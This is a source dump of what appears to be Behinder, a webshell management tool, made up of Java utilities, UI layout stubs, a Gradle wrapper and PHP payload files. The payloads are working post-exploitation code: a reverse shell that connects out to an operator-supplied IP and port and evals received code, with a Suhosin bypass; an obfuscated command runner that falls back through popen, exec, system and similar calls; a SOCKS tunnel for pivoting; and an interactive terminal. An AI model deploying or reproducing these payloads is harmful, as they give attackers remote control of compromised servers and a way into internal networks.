18 | error_reporting(0);if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
19 | }
20 |
21 | function common($ip,$port)
22 | {
23 | @error_reporting(0);
24 | @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);
25 | $dis=@ini_get('disable_functions');
26 | if(!empty($dis)){
27 | $dis=preg_replace('/[, ]+/', ',', $dis);
28 | $dis=explode(',', $dis);
29 | $dis=array_map('trim', $dis);
30 | }else{
31 | $dis=array();
32 | }
33 |
34 | $ipaddr=$ip;
35 |
36 | if(!function_exists('FYOQaKiyqQNfDO')){
37 | function FYOQaKiyqQNfDO($c){
38 | global $dis;
39 |
40 | if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
41 | $c=$c." 2>&1\n";
42 | }
43 | $psCKsTH='is_callable';
44 | $PwRrt='in_array';
45 |
46 | if($psCKsTH('popen')and!$PwRrt('popen',$dis)){
47 | $fp=popen($c,'r');
48 | $o=NULL;
49 | if(is_resource($fp)){
50 | while(!feof($fp)){
51 | $o.=fread($fp,1024);
52 | }
53 | }
54 | @pclose($fp);
55 | }else
56 | if($psCKsTH('exec')and!$PwRrt('exec',$dis)){
57 | $o=array();
58 | exec($c,$o);
59 | $o=join(chr(10),$o).chr(10);
60 | }else
61 | if($psCKsTH('passthru')and!$PwRrt('passthru',$dis)){
62 | ob_start();
63 | passthru($c);
64 | $o=ob_get_contents();
65 | ob_end_clean();
66 | }else
67 | if($psCKsTH('proc_open')and!$PwRrt('proc_open',$dis)){
68 | $handle=proc_open($c,array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);
69 | $o=NULL;
70 | while(!feof($pipes[1])){
71 | $o.=fread($pipes[1],1024);
72 | }
73 | @proc_close($handle);
74 | }else
75 | if($psCKsTH('shell_exec')and!$PwRrt('shell_exec',$dis)){
76 | $o=shell_exec($c);
77 | }else
78 | if($psCKsTH('system')and!$PwRrt('system',$dis)){
79 | ob_start();
80 | system($c);
81 | $o=ob_get_contents();
82 | ob_end_clean();
83 | }else
84 | {
85 | $o=0;
86 | }
87 |
88 | return $o;
89 | }
90 | }
91 | $nofuncs='no exec functions';
92 | if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
93 | $s=@fsockopen("tcp://".$ip,$port);
94 | while($c=fread($s,2048)){
95 | $out = '';
96 | if(substr($c,0,3) == 'cd '){
97 | chdir(substr($c,3,-1));
98 | } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
99 | break;
100 | }else{
101 | $out=FYOQaKiyqQNfDO(substr($c,0,-1));
102 | if($out===false){
103 | fwrite($s,$nofuncs);
104 | break;
105 | }
106 | }
107 | fwrite($s,$out);
108 | }
109 | fclose($s);
110 | }else{
111 | $s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
112 | @socket_connect($s,$ipaddr,$port);
113 | @socket_write($s,"socket_create");
114 | while($c=@socket_read($s,2048)){
115 | $out = '';
116 | if(substr($c,0,3) == 'cd '){
117 | chdir(substr($c,3,-1));
118 | } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
119 | break;
120 | }else{
121 | $out=FYOQaKiyqQNfDO(substr($c,0,-1));
122 | if($out===false){
123 | @socket_write($s,$nofuncs);
124 | break;
125 | }
126 | }
127 | @socket_write($s,$out,strlen($out));
128 | }
129 | @socket_close($s);
130 | }
131 | }
--------------------------------------------------------------------------------
/src/main/java/net/rebeyond/behinder/ui/DatabaseView.fxml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
9 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
25 |
27 |
29 |
31 |
32 |
33 |
34 |
35 |
36 |
38 |
39 |
40 |
41 |
43 |
44 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
54 |
56 |
58 |
59 |
60 |
61 |
62 |
63 |
69 |
71 |
72 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
--------------------------------------------------------------------------------
/src/main/resources/net/rebeyond/behinder/ui/DatabaseView.fxml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
9 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
25 |
27 |
29 |
31 |
32 |
33 |
34 |
35 |
36 |
38 |
39 |
40 |
41 |
43 |
44 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
54 |
56 |
58 |
59 |
60 |
61 |
62 |
63 |
69 |
71 |
72 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
--------------------------------------------------------------------------------
/src/main/java/net/rebeyond/behinder/ui/ReverseViewTab.fxml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
9 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
32 |
33 |
35 |
37 |
39 |
41 |
43 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
54 |
56 |
58 |
60 |
62 |
64 |
65 |
67 |
68 |
69 |
70 |
72 |
73 |
74 |
75 |
76 |
79 |
80 |
81 |
82 |
83 |
--------------------------------------------------------------------------------
/src/main/resources/net/rebeyond/behinder/ui/ReverseViewTab.fxml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
9 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
32 |
33 |
35 |
37 |
39 |
41 |
43 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
54 |
56 |
58 |
60 |
62 |
64 |
65 |
67 |
68 |
69 |
70 |
72 |
73 |
74 |
75 |
76 |
79 |
80 |
81 |
82 |
83 |
--------------------------------------------------------------------------------
/src/main/java/net/rebeyond/behinder/utils/jc/PackageInternalsFinder.java:
--------------------------------------------------------------------------------
1 | package net.rebeyond.behinder.utils.jc;
2 |
3 | import java.io.File;
4 | import java.io.IOException;
5 | import java.net.JarURLConnection;
6 | import java.net.URI;
7 | import java.net.URL;
8 | import java.util.ArrayList;
9 | import java.util.Collection;
10 | import java.util.Enumeration;
11 | import java.util.List;
12 | import java.util.jar.JarEntry;
13 |
14 | public class PackageInternalsFinder {
15 | private final ClassLoader classLoader;
16 | private static final String CLASS_FILE_EXTENSION = ".class";
17 |
18 | public PackageInternalsFinder(ClassLoader classLoader) {
19 | this.classLoader = classLoader;
20 | }
21 |
22 | public List find(String packageName) throws IOException {
23 | String javaPackageName = packageName.replaceAll("\\.", "/");
24 | List result = new ArrayList();
25 | Enumeration urlEnumeration = this.classLoader.getResources(javaPackageName);
26 |
27 | while (urlEnumeration.hasMoreElements()) {
28 | URL packageFolderURL = (URL) urlEnumeration.nextElement();
29 | if (packageFolderURL.toString().startsWith("jar")) {
30 | result.addAll(this.listUnder(packageName, packageFolderURL));
31 | }
32 | }
33 |
34 | return result;
35 | }
36 |
37 | private Collection listUnder(String packageName, URL packageFolderURL) {
38 | File directory = new File(packageFolderURL.getFile());
39 | return directory.isDirectory() ? this.processDir(packageName, directory) : this.processJar(packageFolderURL);
40 | }
41 |
42 | private List processJar(URL packageFolderURL) {
43 | ArrayList result = new ArrayList();
44 |
45 | try {
46 | String jarUri = packageFolderURL.toExternalForm().split("!")[0];
47 | JarURLConnection jarConn = (JarURLConnection) packageFolderURL.openConnection();
48 | String rootEntryName = jarConn.getEntryName();
49 | int rootEnd = rootEntryName.length() + 1;
50 | Enumeration entryEnum = jarConn.getJarFile().entries();
51 |
52 | while (entryEnum.hasMoreElements()) {
53 | JarEntry jarEntry = (JarEntry) entryEnum.nextElement();
54 | String name = jarEntry.getName();
55 | if (name.startsWith(rootEntryName) && name.indexOf(47, rootEnd) == -1 && name.endsWith(".class")) {
56 | URI uri = URI.create(jarUri + "!/" + name);
57 | String binaryName = name.replaceAll("/", ".");
58 | binaryName = binaryName.replaceAll(".class$", "");
59 | result.add(new CustomJavaFileObject(binaryName, uri));
60 | }
61 | }
62 |
63 | jarConn.setDefaultUseCaches(false);
64 | return result;
65 | } catch (Exception var12) {
66 | throw new RuntimeException("Wasn't able to open " + packageFolderURL + " as a jar file", var12);
67 | }
68 | }
69 |
70 | private List processRsrc(URL packageFolderURL) {
71 | ArrayList result = new ArrayList();
72 |
73 | try {
74 | String jarUri = packageFolderURL.toExternalForm().split("!")[0];
75 | JarURLConnection jarConn = (JarURLConnection) packageFolderURL.openConnection();
76 | String rootEntryName = jarConn.getEntryName();
77 | int rootEnd = rootEntryName.length() + 1;
78 | Enumeration entryEnum = jarConn.getJarFile().entries();
79 |
80 | while (entryEnum.hasMoreElements()) {
81 | JarEntry jarEntry = (JarEntry) entryEnum.nextElement();
82 | String name = jarEntry.getName();
83 | if (name.startsWith(rootEntryName) && name.indexOf(47, rootEnd) == -1 && name.endsWith(".class")) {
84 | URI uri = URI.create(jarUri + "!/" + name);
85 | String binaryName = name.replaceAll("/", ".");
86 | binaryName = binaryName.replaceAll(".class$", "");
87 | result.add(new CustomJavaFileObject(binaryName, uri));
88 | }
89 | }
90 |
91 | return result;
92 | } catch (Exception var12) {
93 | throw new RuntimeException("Wasn't able to open " + packageFolderURL + " as a jar file", var12);
94 | }
95 | }
96 |
97 | private List processDir(String packageName, File directory) {
98 | List result = new ArrayList();
99 | File[] childFiles = directory.listFiles();
100 | File[] var5 = childFiles;
101 | int var6 = childFiles.length;
102 |
103 | for (int var7 = 0; var7 < var6; ++var7) {
104 | File childFile = var5[var7];
105 | if (childFile.isFile() && childFile.getName().endsWith(".class")) {
106 | String binaryName = packageName + "." + childFile.getName();
107 | binaryName = binaryName.replaceAll(".class$", "");
108 | result.add(new CustomJavaFileObject(binaryName, childFile.toURI()));
109 | }
110 | }
111 |
112 | return result;
113 | }
114 | }
115 |
--------------------------------------------------------------------------------
/src/main/resources/net/rebeyond/behinder/payload/php/SocksProxy.php:
--------------------------------------------------------------------------------
1 | @error_reporting(0);
2 | function main($cmd,$targetIP="",$targetPort="",$extraData="MTIz")
3 | {
4 | ini_set("allow_url_fopen", true);
5 | ini_set("allow_url_include", true);
6 | if (function_exists('dl'))
7 | {
8 | dl("php_sockets.dll");
9 | }
10 | if( !function_exists('apache_request_headers') ) {
11 | function apache_request_headers() {
12 | $arh = array();
13 | $rx_http = '/\AHTTP_/';
14 |
15 | foreach($_SERVER as $key => $val) {
16 | if( preg_match($rx_http, $key) ) {
17 | $arh_key = preg_replace($rx_http, '', $key);
18 | $rx_matches = array();
19 | $rx_matches = explode('_', $arh_key);
20 | if( count($rx_matches) > 0 and strlen($arh_key) > 2 ) {
21 | foreach($rx_matches as $ak_key => $ak_val) {
22 | $rx_matches[$ak_key] = ucfirst($ak_val);
23 | }
24 |
25 | $arh_key = implode('-', $rx_matches);
26 | }
27 | $arh[$arh_key] = $val;
28 | }
29 | }
30 | return( $arh );
31 | }
32 | }
33 |
34 |
35 | if ($_SERVER['REQUEST_METHOD'] === 'POST') {
36 | set_time_limit(0);
37 | $headers=apache_request_headers();
38 | switch($cmd){
39 | case "CONNECT":
40 | {
41 | $target = $targetIP;
42 | $port = (int)$targetPort;
43 | $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
44 | if ($sock === false)
45 | {
46 | echo "\x37\x21\x49\x36Failed creating socket";
47 | return;
48 | }
49 | $res = @socket_connect($sock, $target, $port);
50 | if ($res === false)
51 | {
52 | echo "\x37\x21\x49\x36Failed connecting to target";
53 | return;
54 | }
55 | socket_set_nonblock($sock);
56 | @session_start();
57 | $_SESSION["run"] = true;
58 | $_SESSION["writebuf"] = "";
59 | $_SESSION["readbuf"] = "";
60 | ob_end_clean();
61 | header("Connection: close");
62 | ignore_user_abort();
63 | ob_start();
64 | $size = ob_get_length();
65 | header("Content-Length: $size");
66 | ob_end_flush();
67 | flush();
68 | session_write_close();
69 |
70 | while ($_SESSION["run"])
71 | {
72 | $readBuff = "";
73 | @session_start();
74 | $writeBuff = $_SESSION["writebuf"];
75 | $_SESSION["writebuf"] = "";
76 | session_write_close();
77 | if ($writeBuff != "")
78 | {
79 | $i = socket_write($sock, $writeBuff, strlen($writeBuff));
80 | if($i === false)
81 | {
82 | @session_start();
83 | $_SESSION["run"] = false;
84 | session_write_close();
85 | echo "\x37\x21\x49\x36Failed writing socket";
86 | }
87 | }
88 | while ($o = socket_read($sock, 512)) {
89 | if($o === false)
90 | {
91 | @session_start();
92 | $_SESSION["run"] = false;
93 | session_write_close();
94 | echo "\x37\x21\x49\x36Failed reading from socket";
95 | }
96 | $readBuff .= $o;
97 | }
98 | if ($readBuff!=""){
99 | @session_start();
100 | $_SESSION["readbuf"] .= $readBuff;
101 | session_write_close();
102 | }
103 | #sleep(0.2);
104 | }
105 | socket_close($sock);
106 | }
107 | break;
108 | case "DISCONNECT":
109 | {
110 | error_log("DISCONNECT recieved");
111 | @session_start();
112 | $_SESSION["run"] = false;
113 | session_write_close();
114 | return;
115 | }
116 | break;
117 | case "READ":
118 | {
119 | @session_start();
120 | $readBuffer = $_SESSION["readbuf"];
121 | $_SESSION["readbuf"]="";
122 | $running = $_SESSION["run"];
123 | session_write_close();
124 | if ($running) {
125 | header("Connection: Keep-Alive");
126 | echo $readBuffer;
127 | return;
128 | } else {
129 | echo "\x37\x21\x49\x36RemoteSocket read filed";
130 | return;
131 | }
132 | }
133 | break;
134 | case "FORWARD":
135 | {
136 | @session_start();
137 | $running = $_SESSION["run"];
138 | session_write_close();
139 | if(!$running){
140 | echo "\x37\x21\x49\x36No more running, close now";
141 | return;
142 | }
143 | header('Content-Type: application/octet-stream');
144 | $rawPostData = base64_decode($extraData);
145 | if ($rawPostData) {
146 | @session_start();
147 | $_SESSION["writebuf"] .= $rawPostData;
148 | session_write_close();
149 | header("Connection: Keep-Alive");
150 | return;
151 | } else {
152 | echo "\x37\x21\x49\x36POST request read filed";
153 | }
154 | }
155 | break;
156 | }
157 | }
158 | }
--------------------------------------------------------------------------------
/src/main/java/net/rebeyond/behinder/ui/FileManagerViewTab.fxml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
9 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
31 |
32 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
44 |
46 |
48 |
49 |
51 |
52 |
53 |
54 |
55 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
69 |
71 |
73 |
74 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
--------------------------------------------------------------------------------
/src/main/resources/net/rebeyond/behinder/ui/FileManagerViewTab.fxml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
9 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
31 |
32 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
44 |
46 |
48 |
49 |
51 |
52 |
53 |
54 |
55 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
69 |
71 |
73 |
74 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
--------------------------------------------------------------------------------
/gradlew:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env sh
2 |
3 | ##############################################################################
4 | ##
5 | ## Gradle start up script for UN*X
6 | ##
7 | ##############################################################################
8 |
9 | # Attempt to set APP_HOME
10 | # Resolve links: $0 may be a link
11 | PRG="$0"
12 | # Need this for relative symlinks.
13 | while [ -h "$PRG" ] ; do
14 | ls=`ls -ld "$PRG"`
15 | link=`expr "$ls" : '.*-> \(.*\)$'`
16 | if expr "$link" : '/.*' > /dev/null; then
17 | PRG="$link"
18 | else
19 | PRG=`dirname "$PRG"`"/$link"
20 | fi
21 | done
22 | SAVED="`pwd`"
23 | cd "`dirname \"$PRG\"`/" >/dev/null
24 | APP_HOME="`pwd -P`"
25 | cd "$SAVED" >/dev/null
26 |
27 | APP_NAME="Gradle"
28 | APP_BASE_NAME=`basename "$0"`
29 |
30 | # Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script.
31 | DEFAULT_JVM_OPTS=""
32 |
33 | # Use the maximum available, or set MAX_FD != -1 to use that value.
34 | MAX_FD="maximum"
35 |
36 | warn () {
37 | echo "$*"
38 | }
39 |
40 | die () {
41 | echo
42 | echo "$*"
43 | echo
44 | exit 1
45 | }
46 |
47 | # OS specific support (must be 'true' or 'false').
48 | cygwin=false
49 | msys=false
50 | darwin=false
51 | nonstop=false
52 | case "`uname`" in
53 | CYGWIN* )
54 | cygwin=true
55 | ;;
56 | Darwin* )
57 | darwin=true
58 | ;;
59 | MINGW* )
60 | msys=true
61 | ;;
62 | NONSTOP* )
63 | nonstop=true
64 | ;;
65 | esac
66 |
67 | CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar
68 |
69 | # Determine the Java command to use to start the JVM.
70 | if [ -n "$JAVA_HOME" ] ; then
71 | if [ -x "$JAVA_HOME/jre/sh/java" ] ; then
72 | # IBM's JDK on AIX uses strange locations for the executables
73 | JAVACMD="$JAVA_HOME/jre/sh/java"
74 | else
75 | JAVACMD="$JAVA_HOME/bin/java"
76 | fi
77 | if [ ! -x "$JAVACMD" ] ; then
78 | die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME
79 |
80 | Please set the JAVA_HOME variable in your environment to match the
81 | location of your Java installation."
82 | fi
83 | else
84 | JAVACMD="java"
85 | which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH.
86 |
87 | Please set the JAVA_HOME variable in your environment to match the
88 | location of your Java installation."
89 | fi
90 |
91 | # Increase the maximum file descriptors if we can.
92 | if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then
93 | MAX_FD_LIMIT=`ulimit -H -n`
94 | if [ $? -eq 0 ] ; then
95 | if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then
96 | MAX_FD="$MAX_FD_LIMIT"
97 | fi
98 | ulimit -n $MAX_FD
99 | if [ $? -ne 0 ] ; then
100 | warn "Could not set maximum file descriptor limit: $MAX_FD"
101 | fi
102 | else
103 | warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT"
104 | fi
105 | fi
106 |
107 | # For Darwin, add options to specify how the application appears in the dock
108 | if $darwin; then
109 | GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\""
110 | fi
111 |
112 | # For Cygwin, switch paths to Windows format before running java
113 | if $cygwin ; then
114 | APP_HOME=`cygpath --path --mixed "$APP_HOME"`
115 | CLASSPATH=`cygpath --path --mixed "$CLASSPATH"`
116 | JAVACMD=`cygpath --unix "$JAVACMD"`
117 |
118 | # We build the pattern for arguments to be converted via cygpath
119 | ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null`
120 | SEP=""
121 | for dir in $ROOTDIRSRAW ; do
122 | ROOTDIRS="$ROOTDIRS$SEP$dir"
123 | SEP="|"
124 | done
125 | OURCYGPATTERN="(^($ROOTDIRS))"
126 | # Add a user-defined pattern to the cygpath arguments
127 | if [ "$GRADLE_CYGPATTERN" != "" ] ; then
128 | OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)"
129 | fi
130 | # Now convert the arguments - kludge to limit ourselves to /bin/sh
131 | i=0
132 | for arg in "$@" ; do
133 | CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -`
134 | CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option
135 |
136 | if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition
137 | eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"`
138 | else
139 | eval `echo args$i`="\"$arg\""
140 | fi
141 | i=$((i+1))
142 | done
143 | case $i in
144 | (0) set -- ;;
145 | (1) set -- "$args0" ;;
146 | (2) set -- "$args0" "$args1" ;;
147 | (3) set -- "$args0" "$args1" "$args2" ;;
148 | (4) set -- "$args0" "$args1" "$args2" "$args3" ;;
149 | (5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;;
150 | (6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;;
151 | (7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;;
152 | (8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;;
153 | (9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;;
154 | esac
155 | fi
156 |
157 | # Escape application args
158 | save () {
159 | for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done
160 | echo " "
161 | }
162 | APP_ARGS=$(save "$@")
163 |
164 | # Collect all arguments for the java command, following the shell quoting and substitution rules
165 | eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS"
166 |
167 | # by default we should be in the correct project dir, but when run from Finder on Mac, the cwd is wrong
168 | if [ "$(uname)" = "Darwin" ] && [ "$HOME" = "$PWD" ]; then
169 | cd "$(dirname "$0")"
170 | fi
171 |
172 | exec "$JAVACMD" "$@"
173 |
--------------------------------------------------------------------------------
/src/main/java/net/rebeyond/behinder/utils/ZipUtil.java:
--------------------------------------------------------------------------------
1 | package net.rebeyond.behinder.utils;
2 |
3 | import java.io.*;
4 | import java.nio.charset.Charset;
5 | import java.util.Enumeration;
6 | import java.util.zip.ZipEntry;
7 | import java.util.zip.ZipFile;
8 | import java.util.zip.ZipOutputStream;
9 |
10 | public class ZipUtil {
11 | private static final int BUFFER_SIZE = 2048;
12 | private static final boolean KeepDirStructure = true;
13 |
14 | public ZipUtil() {
15 | }
16 |
17 | public static void main(String[] args) {
18 | try {
19 | unZipFiles("/Users/rebeyond/newScan.zip", "/Users/rebeyond/newScan");
20 | } catch (Exception var2) {
21 | var2.printStackTrace();
22 | }
23 |
24 | }
25 |
26 | public static void toZip(String srcDir, String outPathFile, boolean isDelSrcFile) throws Exception {
27 | long start = System.currentTimeMillis();
28 | FileOutputStream out = null;
29 | ZipOutputStream zos = null;
30 |
31 | try {
32 | out = new FileOutputStream(new File(outPathFile));
33 | zos = new ZipOutputStream(out);
34 | File sourceFile = new File(srcDir);
35 | if (!sourceFile.exists()) {
36 | throw new Exception("需压缩文件或者文件夹不存在");
37 | }
38 |
39 | compress(sourceFile, zos, sourceFile.getName());
40 | if (isDelSrcFile) {
41 | delDir(srcDir);
42 | }
43 | } catch (Exception var15) {
44 | throw new Exception("zip error from ZipUtils");
45 | } finally {
46 | try {
47 | if (zos != null) {
48 | zos.close();
49 | }
50 |
51 | if (out != null) {
52 | out.close();
53 | }
54 | } catch (Exception var14) {
55 | }
56 |
57 | }
58 |
59 | }
60 |
61 | private static void compress(File sourceFile, ZipOutputStream zos, String name) throws Exception {
62 | byte[] buf = new byte[2048];
63 | if (sourceFile.isFile()) {
64 | zos.putNextEntry(new ZipEntry(name));
65 | FileInputStream in = new FileInputStream(sourceFile);
66 |
67 | int len;
68 | while ((len = in.read(buf)) != -1) {
69 | zos.write(buf, 0, len);
70 | }
71 |
72 | zos.closeEntry();
73 | in.close();
74 | } else {
75 | File[] listFiles = sourceFile.listFiles();
76 | if (listFiles != null && listFiles.length != 0) {
77 | File[] var10 = listFiles;
78 | int var6 = listFiles.length;
79 |
80 | for (int var7 = 0; var7 < var6; ++var7) {
81 | File file = var10[var7];
82 | compress(file, zos, name + "/" + file.getName());
83 | }
84 | } else {
85 | zos.putNextEntry(new ZipEntry(name + "/"));
86 | zos.closeEntry();
87 | }
88 | }
89 |
90 | }
91 |
92 | public static void unZipFiles(String zipPath, String descDir) throws IOException {
93 | long var2 = System.currentTimeMillis();
94 |
95 | try {
96 | File zipFile = new File(zipPath);
97 | if (!zipFile.exists()) {
98 | throw new IOException("需解压文件不存在.");
99 | } else {
100 | File pathFile = new File(descDir);
101 | if (!pathFile.exists()) {
102 | pathFile.mkdirs();
103 | }
104 |
105 | ZipFile zip = new ZipFile(zipFile, Charset.forName("GBK"));
106 | Enumeration entries = zip.entries();
107 |
108 | while (true) {
109 | InputStream in;
110 | String outPath;
111 | do {
112 | if (!entries.hasMoreElements()) {
113 | return;
114 | }
115 |
116 | ZipEntry entry = (ZipEntry) entries.nextElement();
117 | String zipEntryName = entry.getName();
118 | in = zip.getInputStream(entry);
119 | outPath = (descDir + File.separator + zipEntryName).replaceAll("\\*", "/");
120 | File file = new File(outPath.substring(0, outPath.lastIndexOf(47)));
121 | if (!file.exists()) {
122 | file.mkdirs();
123 | }
124 | } while ((new File(outPath)).isDirectory());
125 |
126 | OutputStream out = new FileOutputStream(outPath);
127 | byte[] buf1 = new byte[1024];
128 |
129 | int len;
130 | while ((len = in.read(buf1)) > 0) {
131 | out.write(buf1, 0, len);
132 | }
133 |
134 | in.close();
135 | out.close();
136 | }
137 | }
138 | } catch (Exception var16) {
139 | throw new IOException(var16);
140 | }
141 | }
142 |
143 | public static void delDir(String dirPath) throws IOException {
144 | long var1 = System.currentTimeMillis();
145 |
146 | try {
147 | File dirFile = new File(dirPath);
148 | if (dirFile.exists()) {
149 | if (dirFile.isFile()) {
150 | dirFile.delete();
151 | } else {
152 | File[] files = dirFile.listFiles();
153 | if (files != null) {
154 | for (int i = 0; i < files.length; ++i) {
155 | delDir(files[i].toString());
156 | }
157 |
158 | dirFile.delete();
159 | }
160 | }
161 | }
162 | } catch (Exception var6) {
163 | throw new IOException("删除文件异常.");
164 | }
165 | }
166 | }
167 |
--------------------------------------------------------------------------------
/src/main/resources/net/rebeyond/behinder/payload/php/RealCMD.php:
--------------------------------------------------------------------------------
1 |
2 | @error_reporting(0);
3 |
4 | function main($type, $bashPath = "", $cmd = "")
5 | {
6 | $result = array();
7 | if ($type == "create") {
8 | create($bashPath);
9 | $result["status"] = "success";
10 | } else if ($type == "read") {
11 | if (isset($_SESSION["readBuffer"]))
12 | {
13 | @session_start();
14 | $readContent = $_SESSION["readBuffer"];
15 | $_SESSION["readBuffer"] = substr($_SESSION["readBuffer"], strlen($readContent));
16 | session_write_close();
17 | $result["status"] = "success";
18 | $result["msg"] = $readContent;
19 | }
20 | else
21 | {
22 | $result["status"] = "fail";
23 | $result["msg"] = "Virtual Terminal fail to start or timeout";
24 | }
25 |
26 | } else if ($type == "write") {
27 | $cmd = base64_decode($cmd);
28 | @session_start();
29 | $_SESSION["writeBuffer"] = $cmd;
30 | session_write_close();
31 | $result["status"] = "success";
32 | }
33 | else if ($type == "stop") {
34 | @session_start();
35 | $_SESSION["run"] = false;
36 | session_write_close();
37 | $result["msg"] = "stopped";
38 | $result["status"] = "success";
39 | }
40 | $result["status"] = base64_encode($result["status"]);
41 | $result["msg"] = base64_encode($result["msg"]);
42 | echo encrypt(json_encode($result),$_SESSION['k']);
43 | }
44 |
45 | function getSafeStr($str){
46 | $s1 = iconv('utf-8','gbk//IGNORE',$str);
47 | $s0 = iconv('gbk','utf-8//IGNORE',$s1);
48 | if($s0 == $str){
49 | return $s0;
50 | }else{
51 | return iconv('gbk','utf-8//IGNORE',$str);
52 | }
53 | }
54 |
55 | function create($bashPath)
56 | {
57 | set_time_limit(0);
58 | @session_start();
59 | $_SESSION["readBuffer"] = "";
60 | session_write_close();
61 | $win = (FALSE !== strpos(strtolower(PHP_OS), 'win'));
62 | if ($win) {
63 | $outputfile = sys_get_temp_dir() . DIRECTORY_SEPARATOR . rand() . ".txt";
64 | $errorfile = sys_get_temp_dir() . DIRECTORY_SEPARATOR . rand() . ".txt";
65 | }
66 | $descriptorspec = array(
67 | 0 => array(
68 | "pipe",
69 | "r"
70 | ),
71 | 1 => array(
72 | "pipe",
73 | "w"
74 | ),
75 | 2 => array(
76 | "pipe",
77 | "w"
78 | )
79 | );
80 | if ($win) {
81 | $descriptorspec[1] = array(
82 | "file",
83 | $outputfile,
84 | "a"
85 | );
86 | $descriptorspec[2] = array(
87 | "file",
88 | $errorfile,
89 | "a"
90 | );
91 | }
